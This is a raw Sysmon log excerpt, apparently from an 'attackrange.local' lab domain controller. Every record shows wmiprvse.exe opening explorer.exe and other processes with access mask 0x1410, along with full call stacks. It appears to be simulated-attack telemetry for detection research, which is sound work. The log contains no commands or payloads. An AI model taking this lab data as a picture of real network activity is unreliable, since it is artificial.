9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 